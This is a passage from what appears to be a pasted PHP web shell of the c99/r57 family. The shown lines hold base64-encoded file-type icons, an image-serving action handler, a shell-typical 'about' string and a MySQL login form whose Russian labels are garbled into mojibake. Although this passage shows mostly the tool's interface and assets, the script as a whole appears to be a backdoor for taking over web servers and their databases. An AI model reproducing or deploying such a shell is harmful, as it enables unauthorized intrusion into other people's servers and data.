  2633. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2634. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2635. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2636. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2637. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2638. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2639. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2640. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAEAAQAAAIuwCRCByI".
  2641. "JEAAgggJChgwQIBAAgUSIhFg4MABBAkULGCQkKLFBg4eQIggAaHHAxMoVLBwAYNJDQc2cOjg4QOI".
  2642. "ECJGDBQAk0QJEydQpFCx4oAGhwEGHGDRwsULGDFkzKBR48AAg0pt3MCRQ8cOHj18/LB6UACQA0GE".
  2643. "DCFSxMgRJAcMOBQoIImSJUyaOHliUS5BKFGkTKFSxUrfuQKvYImQRcsWi3ERC+TSxcsXMGEOJxQz".
  2644. "hgxdhpIlCjQoMSAAOw==",
  2645. "ext_mpe"=>
  2646. "R0lGODlhEAAQADMAACH5BAEAAAsALAAAAAAQABAAgwAAAP///4CAgMDAwACAgICAAACAAP8AAP//".
  2647. "AIAAAAD//wAAAAAAAAAAAAAAAAAAAARqcMlBKxUyz8B7EJi2DF4nfCIJgiTgAtl6BoNAUvBik0RP".
  2648. "2zTYSQDgKQif00Co4ggKhRMgqKM4AwWE1MacTaFRAFdCpHEMBARBvCQ7SYY4cewmDtCFg4uo2REP".
  2649. "Bwh6fBovAAkHCYYihS4iEQA7",
  2650. "ext_mpeg"=>
  2651. "R0lGODlhEAAQADMAACH5BAEAAAsALAAAAAAQABAAgwAAAP///4CAgMDAwACAgICAAACAAP8AAP//".
  2652. "AIAAAAD//wAAAAAAAAAAAAAAAAAAAARqcMlBKxUyz8B7EJi2DF4nfCIJgiTgAtl6BoNAUvBik0RP".
  2653. "2zTYSQDgKQif00Co4ggKhRMgqKM4AwWE1MacTaFRAFdCpHEMBARBvCQ7SYY4cewmDtCFg4uo2REP".
  2654. "Bwh6fBovAAkHCYYihS4iEQA7",
  2655. "ext_mpg"=>
  2656. "R0lGODlhEAAQADMAACH5BAEAAAsALAAAAAAQABAAgwAAAP///4CAgMDAwACAgICAAACAAP8AAP//".
  2657. "AIAAAAD//wAAAAAAAAAAAAAAAAAAAARqcMlBKxUyz8B7EJi2DF4nfCIJgiTgAtl6BoNAUvBik0RP".
  2658. "2zTYSQDgKQif00Co4ggKhRMgqKM4AwWE1MacTaFRAFdCpHEMBARBvCQ7SYY4cewmDtCFg4uo2REP".
  2659. "Bwh6fBovAAkHCYYihS4iEQA7",
  2660. "ext_nfo"=>
  2661. "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
  2662. "/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
  2663. "/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
  2664. "/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
  2665. "/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
  2666. "pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
  2667. "dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
  2668. "9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
  2669. "4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2670. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2671. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2672. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2673. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2674. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2675. "AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
  2676. "C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
  2677. "2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
  2678. "CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
  2679. "Ow==",
  2680. "ext_ocx"=>
  2681. "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAIAAAP8AAP//AAAA/wD/AACAAAAAgICA".
  2682. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARKMMlJq704620AQlMQAABlFMAwlIEgEESZnKg6tEJwwOVZ".
  2683. "IjfXKLHryRK4oaRDJByQwlQP1SQkUypAgdpsDYErruRAOpaPm7Q6HQEAOw==",
  2684. "ext_pcx"=>
  2685. "R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
  2686. "gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
  2687. "AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
  2688. "EzWCgwARADs=",
  2689. "ext_php"=>
  2690. "R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
  2691. "t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
  2692. "ext_pif"=>
  2693. "R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
  2694. "/////ywAAAAAEAAQAAAEO/DISasEOGuNDkJMeDDjGH7HpmYd9jwazKUybG+tvOlA7gK1mYv3w7RW".
  2695. "mJRRiRQ2Z5+odNqxWK/YrDUCADs=",
  2696. "ext_pl"=>
  2697. "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
  2698. "GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
  2699. "ext_png"=>
  2700. "R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
  2701. "gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
  2702. "AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
  2703. "EzWCgwARADs=",
  2704. "ext_reg"=>
  2705. "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgACAgMDAwAD//wAAAAAAAANM".
  2706. "aCrcrtCIQCslIkprScjQxFFACYQO053SMASFC6xSEQCvvAr2gMuzCgEwiZlwwQtRlkPuej2nkAh7".
  2707. "GZPK43E0DI1oC4J4TO4qtOhSAgA7",
  2708. "ext_rev"=>
  2709. "R0lGODlhEAAQAFUAACH5BAEAAD8ALAAAAAAQABAAhQAAAOvz+////1gdAFAAANDY4IYCU/9aZJIC".
  2710. "Wtvi7PmyheLq8xE2AAAyUNTc5DIyMr7H09jf5/L5/+Dg8PX6/4SHl/D4/5OXpKGmse/2/ZicqPb6".
  2711. "/28aIBlOAMHI0MzU3MXFHjJQAOfu9d7k7gA4Xv//sRVDAI0GUY0CU+Hn8ABbjfFwOABMfwhfL/99".
  2712. "0v+H1+hatf9syvRjwP+V3gA4boCAAABQhf+j5f++8P950FBQAN/n8PD2/HNzAABilgAAAAaRwIFw".
  2713. "SCz+MJpLhdMzOJ9PAqRQmJxKuNvs5crFZDBCwSIQcECItDqNIlAkGcejRqjb74C8fs8/JiskLD4e".
  2714. "BRERCSMpIg1TVTYqAZGRPBsCCw1jZTSVZZ0CAZdvcQ+SBwqfn5d8pacBqX5KJgEHtAcrrTsMjRM6".
  2715. "rKgLBQyZAiG+rh8tDKJyCc3OEQUdHQx81Xs/QQA7",
  2716. "ext_rmi"=>
  2717. "R0lGODlhFAAUAKL/AAAAAH8Af//4/8DAwL+/v39/fwAAAAAAACH5BAEAAAMALAAAAAAUABQAQANS".
  2718. "OLrcvkXIMKUg4BXCu8eaJV5C8QxRQAmqBTpFLM+nEk3qemUwXkmvxs3n4tWOyCRk5DKdhi0JYGpk".
  2719. "QFm6oNWyylaXud8uxI2Oe8zig8puf5WNBAA7",
  2720. "ext_rtf"=>
  2721. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
  2722. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
  2723. "a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
  2724. "ext_shtm"=>
  2725. "R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAIdjI+pq+DAEIzpTXputLi9rmGc".
  2726. "ETbgR3aZmrIlVgAAOw==",
  2727. "ext_shtml"=>
  2728. "R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAIdjI+pq+DAEIzpTXputLi9rmGc".
  2729. "ETbgR3aZmrIlVgAAOw==",
  2730. "ext_so"=>
  2731. "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
  2732. "WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
  2733. "AAA7",
  2734. "ext_stl"=>
  2735. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA".
  2736. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd".
  2737. "GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7",
  2738. "ext_swf"=>
  2739. "R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
  2740. "nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
  2741. "ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
  2742. "GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
  2743. "NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
  2744. "ext_sys"=>
  2745. "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ".
  2746. "aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ".
  2747. "/aZBVOqkpUa/4KisRC6rEgA7",
  2748. "ext_tar"=>
  2749. "R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
  2750. "Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
  2751. "HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
  2752. "UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
  2753. "uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2754. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2755. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2756. "AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
  2757. "GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
  2758. "HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
  2759. "u4tLAgEAOw==",
  2760. "ext_theme"=>
  2761. "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAAD/AAAA/wCAAAAA".
  2762. "gAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
  2763. "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
  2764. "FxEAOw==",
  2765. "ext_txt"=>
  2766. "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
  2767. "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
  2768. "UpPWG3Ig6Hq/XmRjuZwkAAA7",
  2769. "ext_url"=>
  2770. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA".
  2771. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7".
  2772. "Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk".
  2773. "fRQRADs=",
  2774. "ext_vbe"=>
  2775. "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMAAAP8AAAAAAAAAAAADRii63CEgxibH".
  2776. "kwDWEK3OACF6nDdhngWYoEgEMLde4IbS7SjPX93JrIwiIJrxTqTfERJUHTODgSAQ3QVjsZsgyu16".
  2777. "seAwLAEAOw==",
  2778. "ext_vbs"=>
  2779. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAICAgMDAwAD//wCAgAAAAAAAAAAAAANQ".
  2780. "GLrcECXGJsWTJYyybbTQVBAkCBSgyKGPl2YjCcwnG2qrV13TQBI6GwbXqb0yCgCJJYSZOK4LZPDY".
  2781. "DHSvgEAQAGxrzQKNhgFtz+j0eM2eJQAAOw==",
  2782. "ext_vcf"=>
  2783. "R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwICAAP//AAAA/4CAgIAAAAAAgP//".
  2784. "//8AAAAAAAAAAAAAAAAAAAAAAAAAAARYUElAK5VY2X0xp0LRTVYQAMWZaZWJAMJImiYVhEVmu7W4".
  2785. "srfeSUAUeFI10GBJ1JhEHcEgNiidDIaEQjqtAgiEjQFQXcK+4HS4DPKADwey3PjzSGH1VTsTAQA7",
  2786. "ext_wav"=>
  2787. "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
  2788. "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
  2789. "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
  2790. "ext_wma"=>
  2791. "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
  2792. "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
  2793. "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
  2794. "ext_wmf"=>
  2795. "R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
  2796. "gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
  2797. "AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
  2798. "EzWCgwARADs=",
  2799. "ext_wri"=>
  2800. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
  2801. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
  2802. "a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
  2803. "ext_xml"=>
  2804. "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
  2805. "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2806. "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
  2807. "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
  2808. "IQA7",
  2809. "ext_xsl"=>
  2810. "R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAAAPHx8f///4aGhoCAAP//ADNmmabK8AAA".
  2811. "gAAAmQCAgDP//zNm/zOZ/8DAwDOZAAAA/zPM/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2812. "AAAAAAAAAAAAAAAAAAV3oDSMZDlKqBgIa8sKzpAOr9s6gqzWPOADItZhpVAwhCvgIHBICBSCRQMh".
  2813. "SAyVTZZiEXkgVlYl08loPCBUa0ApIBBWiDhSAHQXfLZavcAnABQGgYFJBHwDAAV+eWt2AAOJAIKD".
  2814. "dBKFfQABi0AAfoeZPEkSP6OkPyEAOw=="
  2815. );
  2816. $imgequals = array(
  2817. "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
  2818. "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"),
  2819. "ext_htaccess"=>array("ext_htaccess","ext_htpasswd")
  2820. );
  2821.  ksort($arrimg);
  2822.  if (!$getall)
  2823.  {
  2824.   header("Content-type: image/gif");
  2825.   header("Cache-control: public");
  2826.   header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  2827.   header("Cache-control: max-age=".(60*60*24*7));
  2828.   header("Last-Modified: ".date("r",filemtime(__FILE__)));
  2829.   foreach($imgequals as $k=>$v)
  2830.   {
  2831.    if (in_array($img,$v)) {$img = $k;}
  2832.   }
  2833.   if (empty($arrimg[$img])) {$img = "small_unk";}
  2834.   if (in_array($img,$ext_tar)) {$img = "ext_tar";}
  2835.   echo base64_decode($arrimg[$img]);
  2836.  }
  2837.  else
  2838.  {
  2839.   echo  "<center>";
  2840.   $k = array_keys($arrimg);
  2841.   foreach ($k as $u)
  2842.   {
  2843.    echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";
  2844.   }
  2845.   echo "</center>";
  2846.  }
  2847.  exit;
  2848. }
  2849. if ($act == "about")
  2850. {
  2851.  $d�ta = "Any stupid copyrights and copylefts";
  2852.  echo $data;
  2853. }
  2854.  
  2855. $microtime = round(getmicrotime()-$starttime,4);
  2856. ?>
  2857.  
  2858. <html>
  2859. <head>
  2860. </head>
  2861. <body>
  2862. <center> <br><br>
  2863. <table width=620 cellpadding=0 cellspacing=0 align=center>
  2864.     <col width=1>
  2865.     <col width=600>
  2866.     <col width=1>
  2867.     <tr> <td></td>
  2868.          <td align=left class=texte>
  2869.          <br> <form action='' method='post'> <input type='hidden' name='action' value='connect'>
  2870.            <table border=0 align=center>
  2871.            <col>
  2872.            <col align=left>
  2873.            <tr> <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>
  2874.            ������� ������ ��� ����������� � mySQL �������!<br><br>
  2875.                 </td>
  2876.            </tr>
  2877.            <tr> <td class=texte>����� �������:</td>
  2878.                 <td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td>
  2879.            </tr>
  2880.            <tr> <td class=texte>�������� ����:</td>
  2881.                 <td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td>
  2882.            </tr>
  2883.            <tr> <td class=texte>�����:</td>
  2884.                 <td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td>
  2885.            </tr>
  2886.            <tr> <td class=texte>������</td>
  2887.                 <td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td>
  2888.            </tr>
  2889.            </table>
  2890.            <br> <center> <br><br>
  2891.            <input type='submit' value=' ����������� ' class=form></center> </form> <br><br>
  2892.            </td>
  2893.                 <td></td>
  2894.             </tr>
  2895.             <tr> <td height=1 colspan=3></td>
  2896.           </tr>
  2897.           </table> </center>
  2898.           </body>
  2899.           </html>
  2900.  
Add Comment
Please, Sign In to add comment